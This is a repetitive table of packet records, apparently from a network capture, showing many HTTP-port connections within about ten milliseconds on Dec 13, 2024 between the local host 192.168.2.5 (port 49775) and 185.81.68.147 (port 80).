Dec 13, 2024 01:37:36.135230064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135272026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135272026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135288000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135297060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135329008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135329008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135426998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135502100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135518074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135540962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135591984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135621071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135634899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135658026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135673046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135700941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135715008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135740995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135767937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135782003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135802984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135817051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135839939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135854006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135874033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135889053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135910034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135924101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135943890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135957956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135977983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135993004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136012077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136212111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136225939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136249065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136274099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136287928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136307001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136321068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136344910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136358976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136379957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136394978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136415005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136429071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136450052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136464119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136483908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136497974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136517048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136533022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136554956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136571884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136593103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136679888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136703968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136718035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136739969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136759043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136775017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136846066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136861086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136882067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136897087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136945963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136977911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.136996031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137022972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137037039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137068033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137083054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137108088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137123108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137144089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137156963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137178898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137192965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137212992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137228012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137248039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137263060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137290001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137305021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137430906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137469053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137495041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137509108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137535095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137547970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137576103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137590885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137614965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137629032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137654066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137670040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137701988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137718916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137746096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137881994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137912035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.137931108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138034105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138034105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138051033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138070107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138123035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138150930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138164997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138197899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138223886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138251066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138266087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138290882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138305902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138329029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138343096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138364077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138379097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138396978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138458967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138484955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138506889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138521910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138554096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138580084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138602018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138619900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138636112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138664007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138678074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138705015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138719082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138742924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138756037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138783932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138798952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138823032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138953924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138978004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.138993979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139095068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139110088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139208078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139239073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139266968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139292002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139307976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139331102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139347076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139364958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139388084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139400959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139425993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139442921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139523983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139558077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139579058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139596939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139630079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139655113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139671087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139698029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139712095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139739990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139754057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139780998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139794111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139817953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139831066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139858007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139873028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.139902115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140103102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140135050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140151978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140177965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140192986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140260935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140285969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140300035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140326023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140373945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140396118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140415907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140477896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140502930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140516043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140539885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140553951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140578985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140594959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140611887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140780926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140813112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140826941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140850067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140863895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140883923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140898943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140919924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140949011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140963078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.140985966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141000986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141022921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141041040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141056061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141148090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141161919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141184092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141200066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141261101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141274929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141302109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141349077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141376019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141391039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141415119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141428947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141485929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141504049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141519070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141540051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141554117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141577005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141593933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141613960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141774893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141798973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141819954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141834974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141858101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141874075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141899109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141912937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141933918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141948938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141963959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.141983032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142009020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142009020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142108917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142126083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142153025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142205954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142236948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142251968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142271996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142319918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142338037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142357111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142378092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142442942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142442942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142461061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142482996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142497063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142524004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142545938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142565012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142708063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142740965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142755032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142776966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142791033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142812967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142827988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142841101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142860889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142879009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142893076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142918110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142931938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142960072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.142973900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143071890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143085957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143107891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143121958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143182993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143196106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143218040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143284082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143284082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143300056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143327951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143383026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143405914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143419981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143443108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143459082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143479109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143493891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143512964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143662930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143693924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143707037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143728971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143742085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143769026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143788099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143810034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143830061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143843889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143867016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143882036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.143903971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144001007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144026995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144042015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144100904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144124985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144139051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144188881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144217968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144232035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144254923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144301891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144328117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144339085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144364119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144378901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144398928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144413948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144433975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144448042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144592047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144608021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144632101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144644976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144670010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144684076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144704103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144718885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144740105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144753933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144776106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144789934 CET	49775	80	192.168.2.5	185.81.68.147
